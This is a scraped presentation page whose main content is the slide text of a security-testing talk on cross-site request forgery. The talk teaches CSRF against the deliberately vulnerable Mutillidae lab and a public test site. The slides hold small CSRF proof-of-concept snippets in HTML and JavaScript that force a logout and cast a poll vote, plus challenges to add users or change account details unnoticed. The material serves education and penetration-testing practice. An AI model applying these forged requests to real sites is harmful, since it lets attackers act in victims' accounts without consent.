Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Oh no, was that CSRF #Ouch

  • 1.   OH NO, WAS THAT  CSRF ? Abhinav Sejpal
  • 2. WHO AM I I' M new Generation Exploratory Testy Researcher & Reader in free time Spekear at  Facilitator at Weekend Testing Crowd Tester (AKA. Bug bounty Hunter)   Reported Security Vulnerabilities for 50+ unique customers all over the world  inlcluding Apple, yahoo, Outlook, adobe & etc. Proficient at Functional, Usability , Accessibility & Compatibility Testing Love to develop nasty code  & Hack it :) Works as Quality Analyst at AKA. Bug Wrangler Null  & OWASP Co mmunity passbrains.com
  • 4. DISCLAIMER This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages.   Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly. Feel free to use this presentation for practice or education purpose. ^ I hope - You gotcha ^
  • 5. SOCIAL MEDIA FEED Hashtag for this session      # ,  #BitzNightTesting CSRF : Twitter handle for feedback :  @   @weekendtesting Abhinav_Sejpal G+  http://goo.gl/kMAOs1
  • 6. AGENDA Introducation Set up Pen Testing LAB Overview of HTTP Request Intercept the HTTP Request using Proxy (MITM) Understanding cross site attacks Testing for a cross site request forgery risk Attack Anti-forgery Attacks Common Defences Against CSRF
  • 7. SETUP THE TEST LAB Install XAMPP for:Acronym X (to be read as "cross", meaning )cross-platform Apache HTTP Server MySQL PHP Perl
  • 8. Why MySQL?  is  Girlfriend of PHP TARGETED APPLICATION Client Side language : HTML & Javascript Server side Language: PHP DB : MYSQL  Why PHP ?  - Any answer Here? MySQL <3 
  • 9. http://w3techs.com/technologies/overview/programming_lang PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE.
  • 10. PHP: 244M SITES 2.1M IP ADDRESSES
  • 11. 2013 Server-side Programming Language of the Year Don't Mind Power of PHP > Facebook & yahoo  http://w3techs.com/blog/entry/web_technologies_of_the_year
  • 12. It's a free, open source web application provided to allow security enthusiast to pen-test and hack a web application. V.2X developed by  aka PLAY GROUND  MUTILLIDAE Jeremy Druin webpwnized.
  • 13. ALL SET WITH MULTILLIDAE ?
  • 14. AM I VULNERABLE TO 'CSRF' ?
  • 15. OWASP A8 - CSRF CROSS-SITE REQUEST FORGERY
  • 18.
  • 20. Proxy (Man in the middle) Intercept Request & Respond from client
  • 22. CSRF AKA. XSRF   THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS AGAINST A USER’S BROWSER.  Permission fakingstealing  Disruption of the normal sequence of the site
  • 23. http://127.0.0.1/xampp/mutillidae/index.php?do=logout DEMO #1 Login ID - admin password - adminpass HTTP GET Request
  • 24. <a href= > : ANSWER  DEMO 1: <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout Click me </a> </html>
  • 25. Yes it's not dangerous but annoying UNDERSTANDING Logout page has a simple HTTP GET that required no confirmation Every user who visited that page would immediately be logged out - that's CSRF in action.
  • 26. SO WHAT DO YOU THINK, IT'S ALL ABOUT CLICK ? ssh, No!! Would you like to write CSRF exploit without click ??
  • 27. <img src= > CSRF GET Request with Image Tag <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout </html>
  • 28. HTTP REQUEST <iframe src=" http://127.0.0.1/xampp/mutillidae/index.php? do=logout"></iframe>            <script> var X= new Image();                                                X.src= " http://127.0.0.1/xampp/mutillidae/index.php?do=logout ";                 </script>
  • 30. <html> <title> CSRF Demo 1 </title> <a href = > Click me </a> </html> :: SOLUTION #1 :: http://127.0.0.1/xampp/mutillidae/index.php? page=user-poll.php&csrf- token=&choice=nmap&initials=n&user-poll-php-submit- button=Submit+Vote
  • 31. DOES IT EASY TO CREATE CSRF HTTP REQUEST ? No - you should try out   IronWASP    CSRF PoC Generator - Tool for automatically generating exploits for CSRF vulnerabilities * One Click POC * * Hybrid automation * thanks a ton to Lava & Jayesh 
  • 32.
  • 33. { Post HTTP Request } CHALLENGE  #2
  • 34. CHALLENGE  #3 Add user with out admin knowledge
  • 35. LIVE CHALLENGE * SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST CSRF & XSRF Update the user info. without their knowledge http://testphp.vulnweb.com/userinfo.php Copyright © 2014, Acunetix Ltd
  • 36. Can we exploit this with Level #2 ? You've been CSRF'd with static token! 
  • 37. Lets try with Level - 3
  • 38. ~ Keep Hacking your Code ~ There is no silver bullet to stop this - Just Trust your code
  • 39. POPULAR COOL FINDINGS by AmolFacebook CSRF worth USD 5000 GOOGLE GROUPS PROFILE CSRF Google Account display pic deletion Facebook Account deactivation Advance Leanings -  CSRF Token Validation Fail http://haiderm.com/csrf-token-protection-bypass-methods/
  • 40. INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING IN TWITTER Thank-you http://garage4hackers.com/ community
  • 41. - Twitter Folks -  @  @ , @ , @   CREDITS riyazwalikar TroyHunt yog3sharma makash & @ Big thank You to @  , @  & you All. anatshri weekendtesting srinivasskc
  • 42. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
  • 43. LICENSE AND COPYRIGHTS https://slides.com/abhinavsejpal/weekend-testing-csrf copyrights 2013-2014 Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported   Dedicated to my lovely daddy